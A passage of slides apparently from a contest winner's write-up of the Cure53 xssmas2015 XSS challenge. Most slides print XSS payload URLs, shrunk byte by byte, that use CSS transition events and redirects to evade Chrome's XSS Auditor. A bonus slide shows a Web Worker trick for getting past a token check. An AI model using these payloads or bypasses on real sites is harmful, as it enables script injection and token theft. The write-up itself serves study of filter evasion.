    JSFiddle results Focusable elements“grow” and outline-width when focused. So… transition:1s will trigger a transition when we focus any focusable element. And we already know how to do that. + We are reusing the style, id and tabindex properties as well as the location.hash !! + Next steps? 145 ?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’ onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
  • 20.
    ‘onf$ck=’#asd!$@41 I got outof ideas many times. Different solutions but all the same length, dead paths, more dead paths… I was trying to reuse more parts of the first injection (tried with replace, slice and concatenation) but I couldn’t save too much :(
  • 21.
  • 22.
    2paths1injection New idea andwrote Mario asking if getting an alert(URL) in both injection was valid, and he said YES. So I basically broke the Twitter barrier :) Using the same payload in both injections: + Note the extra “&” in order to concat the “xss” parameter + We need to put “oncut” at some place to cheat the anti-XSS. + The 0<script>1 will be syntactically correct but on the second page will throw an “not defined” exception. + XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,” ?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL) ||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x 139
  • 23.
    2paths1injection And saved somemore bytes.... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: 0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x 137
  • 24.
    2paths1injection And a fewmore... This one worth the creativity special prize :D ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 25.
    2paths1injection And a fewmore... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 26.
    2paths1injection And a fewmore... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... BACK TO 145 :( ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 145
  • 27.
    my first shortestsolution Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this: 141 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x What in index.php was: ?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` , location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x And in index3.php: ?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x ONLY ONE ALERT
  • 28.
    a little shorter137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D
  • 29.
    a little shorter137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D This was on January 12th, and I could rest until @molnar_g did 136 a week (a very long one indeed) before the end of contest.
  • 30.
    JS strings 101135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: The winner vector
  • 31.
    JS strings 101135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: ?&xss=/index2.php'style=transition: 1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all [58].src,URL]+tabindex=1#x ?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut= [`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
  • 32.
    Jontransition & Co. Acouple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~ and @phiber told me that I was going to be defeated, driving me crazy. So I started thinking again trying to split, slice, replace the innerHTML in order to save 1 byte more by reusing the “transition” string from “Jontransition”. But I couldn’t improve the vector on that way, so I tried again some other paths...
  • 33.
    more ideas ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location= [`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x Alternative135 solution. ?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location= [`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136): + oncut == null vs. onend == undefined + +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
  • 34.
    the end At theend Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning and suffering I was lucky enough to win :) I hope not having bored you too much, and that you have find at least something interesting... Congrats to the rest of the winners :) Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their knowledge.
  • 35.
  • 36.
    bonus token.php + Server-side checksfor the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token. + Client-side check: if (document.location.href == document.location.protocol + '//localhost' + location.pathname) callback({foo:”thesecret”}) Web Worker’s context allows to set the document and location properties and importScripts the file. document={location:{href:’//localhost’,protocol:’’}};location={pathname:’’};importScripts(‘https://xssmas2015. cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage So that should bypass the client-side check and get the token for index2.php, but... + Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file). + Chrome neither sends cookies on cross-domain requests from a Web Worker (B req. A), unless the page B which created the Web Worker is loaded in a page-A’s iframe (dafuq :S is this in the spec?)